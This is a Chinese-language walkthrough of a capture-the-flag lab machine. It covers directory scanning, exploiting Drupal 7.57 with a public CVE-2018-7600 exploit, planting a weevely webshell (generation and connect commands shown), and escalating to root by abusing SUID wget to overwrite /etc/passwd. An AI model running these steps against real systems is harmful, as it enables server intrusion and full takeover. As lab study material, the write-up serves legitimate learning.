1、寻址靶机的IP
2、扫描靶机开放的端口
ssh-22 apache-80
3、访问web网站
这是apache说明文章,我们因此对其进行网站扫描
4、使用gobuster进行目录扫描‘’
gobuster dir -u http://192.168.0.109 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
我们可以发现有 drupal网站,我们进去访问
可以发现是一个登录界面,从网页信息中可以获得一个用户james
我们在对drupal进行目录扫描
可以看到用户泄露,我们对admin进行解密得到其密码为admin 123
我尝试在网页登录和ssh登录都无法登录成功
4、我们对其网站进行cms指纹识别
可以了解到drupal版本在7左右,通过drupal目录下有个文件CHANGELOG.txt
可以了解到drupal版本在7.57
5、寻找drupal漏洞
可以在网上寻找到drupal7.57漏洞 ,GitHub - pimps/CVE-2018-7600: Exploit for Drupal 7 <= 7.57 CVE-2018-7600 找到exp
这个漏洞是可以进行远程命令执行漏洞
python drupa7-CVE-2018-7600.py http://192.168.0.109/drupal -c "ls"
因此我们可以进行上传马,我们使用蚁剑连接
首先在kali中开启apache服务
python3 -m http.server 8888
蚁剑连接成功后,我们需要进行提权,首先在kali中监听端口,进行反弹shell
蚁剑连接后,我无法尝试反弹shell,在此我们了解到一个新工具weevely也可以进行反弹shell
──(root㉿wxs)-[~/anyue/hackNos]
└─# weevely generate 123 Nos.php
123连接密码,Nos.php文件,进行连接
┌──(root㉿wxs)-[~/anyue/hackNos/drupal]
└─# weevely http://192.168.0.109/drupal/Nos.php 123
进行反弹shell后,我们进行查找信息
找到一个base64文件,我们进行解密
解密后还是一个加密是一个brainfuck加密,我们使用许愿星进行解密
得到-james-Hacker@4514
无法ssh登录,尝试网页登录
网页登录但是没什么用,接着使用之前反弹shell进行提权
可以看见有个wget 和 passwd 因此我们可以进行suid提权
看到了wget,以及passwd。接下来的思路就是先把靶机的passwd文件搞过来,在其中创建一个新用户,然后把新的passwd文件还回去即可在靶机上获取一个高权限用户
我们就可以给其复制到本地然后生成一个hash值添加进去
openssl passwd -l -salt 用户名 passwd
生成密码后我们需要创建/etc/passwd然后让靶机下载
那个0:0标记着root权限
最后我们进行切换用户